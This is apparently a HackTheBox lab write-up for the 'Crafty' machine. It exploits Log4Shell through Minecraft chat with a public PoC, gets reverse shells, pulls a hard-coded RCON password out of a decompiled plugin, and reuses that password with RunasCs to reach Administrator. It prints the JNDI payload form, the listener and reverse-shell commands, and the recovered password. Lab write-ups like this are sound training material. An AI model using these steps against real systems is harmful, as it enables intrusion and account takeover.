In this post we walk through the HackTheBox Crafty machine: a Minecraft 1.16.5 server vulnerable to Log4Shell (CVE-2021-44228) gives us a shell as the service account, and a password recovered from a server plugin turns out to be reused by the local Administrator.
Information Gathering and Enumeration
We start with an Nmap scan as shown below
nmap -p- --min-rate 10000 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
nmap -p 80,25565 -sCV 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds
Minecraft Server Exploitation
Based on the nmap scan results, the Minecraft server is listening on port 25565, so we can talk to it directly with nc. The two bytes below are the legacy server list ping; the server answers with its version, MOTD and player counts, which is the same probe nmap used to fingerprint it:
echo -ne "\xfe\x01" | nc crafty.htb 25565
Log4Shell (CVE-2021-44228) is one of the most dangerous flaws found to date. Vulnerable versions of the popular Java logging package Log4j 2 evaluate ${...} lookups inside the messages they log, so an attacker who can get a string such as ${jndi:ldap://attacker-host/x} written to the log can make the JVM contact a server they control and load a class from it, which means remote code execution. Minecraft Java Edition was one prominent victim, because the server logs every chat message through Log4j.
The effects of Log4Shell on Minecraft are discussed here. In particular, servers running 1.12–1.16.5 need their start command line changed so that Log4j loads a configuration that disables message lookups, or must be upgraded to a version where Mojang ships the fix. Crafty's server reports 1.16.5, squarely inside the affected range.
Start by downloading the Minecraft Console Client (MCC) from here; we need it to join the server and send the Log4j payload as a chat message.
As shown below, we run the client with kali as the username, press Enter for a blank password (the server runs in offline mode, so no Mojang account is needed) and give crafty.htb as the server address when prompted.
./MinecraftClient-20240415-263-linux-x64 kali
Minecraft Console Client v1.20.4 - for MC 1.4.6 to 1.20.4 - Github.com/MCCTeam
GitHub build 263, built on 2024-04-15 from commit 403284c
Password(invisible):
You chose to run in offline mode.
Server IP :
Resolving crafty.htb...
Retrieving Server Info...
Server version : 1.16.5 (protocol v754)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
>
The next step is to start a listener on the attacking machine. The connection shown below only arrives once the payload has been sent in a later step:
nc -lnvp 445
Listening on 0.0.0.0 445
Connection received on 10.10.11.249 49682
Next, download the PoC and install its requirements:
attacker@attacker$ git clone https://github.com/kozmer/log4j-shell-poc.git
attacker@attacker$ cd log4j-shell-poc/
attacker@attacker$ pip install -r requirements.txt
Before running the exploit, download the Java 8 JDK build the PoC expects from here, extract it into the PoC directory and make sure the extracted directory is named jdk1.8.0_20, because poc.py hard-codes that path. Keep in mind that this variant relies on the target JVM loading a class from a remote codebase, which Java has blocked by default since 8u191; it works here, but it will not work against every Log4j-vulnerable target.
Next, open poc.py and locate the line in the embedded Java source that reads String cmd="/bin/sh"; and change it to String cmd="cmd.exe";, because the target is Windows and /bin/sh does not exist there.
And lastly, run the exploit:
python poc.py --userip 10.10.14.6 --webport 8000 --lport 445
Now switch back to the Minecraft console client and send the lookup string that poc.py prints (of the form ${jndi:ldap://<attacker-ip>:1389/a}) as a chat message. The server logs the message through Log4j, resolves the JNDI lookup against the PoC's LDAP server, loads the class it serves, and a shell lands on the listener started earlier:
c:\Users\svc_minecraft\Desktop> powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\svc_minecraft\Desktop>
Windows Privilege Escalation and Post Exploitation
Listing C:\Users shows the accounts present on the target:
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/10/2020 8:17 AM Administrator
d-r--- 10/26/2023 7:03 PM Public
d----- 11/21/2023 12:53 AM svc_minecraft
The Minecraft server we exploited earlier lives under the svc_minecraft profile, as shown below:
PS C:\Users\svc_minecraft\server> ls
Directory: C:\Users\svc_minecraft\server
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/10/2024 12:11 PM logs
d----- 10/27/2023 2:48 PM plugins
d----- 6/10/2024 2:44 PM world
-a---- 11/14/2023 10:00 PM 2 banned-ips.json
-a---- 11/14/2023 10:00 PM 2 banned-players.json
-a---- 10/24/2023 1:48 PM 183 eula.txt
-a---- 11/14/2023 11:22 PM 2 ops.json
-a---- 10/24/2023 1:43 PM 37962360 server.jar
-a---- 11/14/2023 10:00 PM 1130 server.properties
-a---- 6/10/2024 2:38 PM 111 usercache.json
-a---- 10/24/2023 1:51 PM 2 whitelist.json
An interesting part of exploiting a Minecraft server is looking through the plugins directory and analyzing the installed plugins.
I discovered one plugin named playercounter-1.0-SNAPSHOT.jar and decided to analyze it locally on my attacker machine.
I followed the steps below to transfer it. First, start an SMB share on the attacker machine:
attacker@attacker$ smbserver.py share . -smb2support -username kali -password kali
On the target Windows machine:
PS C:\Users\svc_minecraft\server\plugins> net use \\10.10.14.6\share /u:kali kali
The command completed successfully.
PS C:\Users\svc_minecraft\server\plugins> copy playercounter-1.0-SNAPSHOT.jar \\10.10.14.6\share\
Java Reverse Engineering & Credential Harvesting
Since the plugin is written in Java, we need a Java decompiler to analyze it; I used JD-GUI for this purpose.
After opening the plugin file in the decompiler, we can note the following observations:
- Playercounter.class contains the main code logic of the plugin, and plugin.yml houses its metadata.
- The main code uses rkon to connect to an RCON service on port 27015, authenticating with s67u84zKq8IXw as the password.
Credential Re-use
A hard-coded password like this is a prime candidate for reuse. To test it against the local Administrator account, we transfer RunasCs to the target and run a command under those credentials:
PS C:\programdata> wget http://10.10.14.6/RunasCs.exe -outfile RunasCs.exe
PS C:\programdata> .\RunasCs.exe Administrator s67u84zKq8IXw "cmd /c whoami"
Since whoami comes back as the Administrator, the password is indeed reused. RunasCs can also redirect the new process's standard streams to a remote host and port with -r, so we start a new listener on the attacker machine and point a cmd.exe at it:
PS C:\programdata> .\RunasCs.exe Administrator s67u84zKq8IXw cmd -r 10.10.14.6:443
[+] Running in session 1 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: WinSta0\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3436 created in background.
On the attacker machine:
attacker@attacker$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.249 49721
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
crafty\administrator
The shell runs as crafty\administrator, which concludes the machine.